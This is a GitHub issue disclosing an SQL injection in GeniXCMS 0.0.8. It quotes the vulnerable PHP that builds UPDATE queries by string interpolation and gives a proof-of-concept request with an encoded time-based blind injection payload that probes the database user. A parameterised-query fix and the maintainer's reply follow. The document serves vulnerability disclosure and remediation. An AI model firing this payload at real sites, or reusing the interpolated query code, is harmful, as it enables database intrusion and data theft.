SQL Injection in Options.class.php through 0.0.8 version #68

Closed
superfish9 opened this issue Jan 19, 2017 · 2 comments


superfish9 commented Jan 19, 2017

GeniXCMS_v0.0.8/inc/lib/Mod.class.php

if (isset($_GET['page']) && $_GET['page'] == "modules") {
            if (isset($_GET['act'])) {
                if ($_GET['act'] == ACTIVATE) {
                    if(!Token::isExist($_GET['token'])){
                        $alertred[] = TOKEN_NOT_EXIST;
                    }
                    if(!isset($alertred)){
                        self::activate($_GET['modules']);
                        $GLOBALS['alertgreen'] = MODULES_ACTIVATED;
                    }else{
                        $GLOBALS['alertred'] = $alertred;
                    }

continue:

public static function activate($mod){
        $json = Options::v('modules');
        $mods = json_decode($json, true);
        //print_r($mods);
        if (!is_array($mods) || $mods == "") {
            $mods = array();
        }
        if (!in_array($mod, $mods)) {
            # code...
            $mods = array_merge($mods, array($mod));
        }
        $mods = json_encode($mods);
        $mods = Options::update('modules', $mods);
        if($mods){
            return true;
        }else{
            return false;
        }
    }

GeniXCMS_v0.0.8/inc/lib/Options.class.php

public static function update($key, $val = '')
    {
        if (is_array($key)) {
            foreach ($key as $k => $v) {
                $post = Db::query("UPDATE `options` SET `value`='{$v}' WHERE `name` = '{$k}' LIMIT 1");
            }
        } else {
            $post = Db::query("UPDATE `options` SET `value`='{$val}' WHERE `name` = '{$key}' LIMIT 1");
        }
        return $post;
    }

POC:

first, access forgotpassword.php to get a token:
token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm
then access:
http://127.0.0.1/genixcms0.0.8/index.php?page=modules&act=activate&token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm&modules=aa%27%20and%20%28select%20*%20from%20%28select%28if%28ascii%28substr%28%28select%20user%28%29%29%2C1%2C1%29%29%3D114%2Csleep%282%29%2C0%29%29%29a%29%20or%20%27a%27%3D%27a

We'll find that the page sleeps for 2 seconds (because my MySQL user is root), which proves the vulnerability exists.
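As an added example (not GeniXCMS code and not the project's actual fix), here is the defensive pattern that closes this class of bug: an Options::update that binds `name` and `value` as parameters instead of interpolating them into the SQL string, plus an identifier check for the module name that Mod::activate receives. The in-memory SQLite schema, the PDO handle and the sample payload are constructed for the demo; the real project uses its own Db class against MySQL.

```php
<?php
// Added example, not GeniXCMS code. Runs stand-alone on an in-memory
// SQLite database through PDO (assumption: the project's Db class is
// replaced by a PDO handle here).

class OptionsHardened
{
    /** @var PDO */
    private static $pdo;

    public static function init(PDO $pdo)
    {
        self::$pdo = $pdo;
    }

    // Same signature as the reported Options::update, but every value is
    // bound as a parameter, so it travels as data and cannot change the SQL.
    public static function update($key, $val = '')
    {
        $pairs = is_array($key) ? $key : array($key => $val);
        $stmt = self::$pdo->prepare(
            'UPDATE options SET value = :value WHERE name = :name'
        );
        $ok = true;
        foreach ($pairs as $name => $value) {
            $ok = $stmt->execute(array(':value' => $value, ':name' => $name)) && $ok;
        }
        return $ok;
    }
}

// Defence in depth for Mod::activate: a module name is an identifier, so
// reject anything that is not one before it is merged into the options row.
function isValidModuleName($mod)
{
    return is_string($mod) && preg_match('/^[A-Za-z0-9_-]{1,64}$/', $mod) === 1;
}

// Constructed demo schema and data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE options (name TEXT PRIMARY KEY, value TEXT)');
$pdo->exec("INSERT INTO options VALUES ('modules', '[]')");
OptionsHardened::init($pdo);

// A constructed quote-bearing value: rejected by the identifier check, and
// even if it reaches update() it is stored literally rather than executed.
$payload = "aa' or 'a'='a";
var_dump(isValidModuleName($payload));
OptionsHardened::update('modules', json_encode(array($payload)));
$row = $pdo->query("SELECT value FROM options WHERE name = 'modules'")->fetchColumn();
var_dump($row === json_encode(array($payload)));
```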

@superfish9 superfish9 changed the title SQL Injection in Options.class.php SQL Injection in Options.class.php through 0.0.8 version Jan 19, 2017
@semplon semplon self-assigned this Jan 19, 2017

semplon commented Jan 19, 2017

Thank you @superfish9, I'll look into it.


semplon commented Jan 19, 2017

Options.class.php security issue already fixed with this commit https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Options.class.php#L57

semplon pushed a commit that referenced this issue Jan 22, 2017
@semplon semplon closed this as completed Jan 22, 2017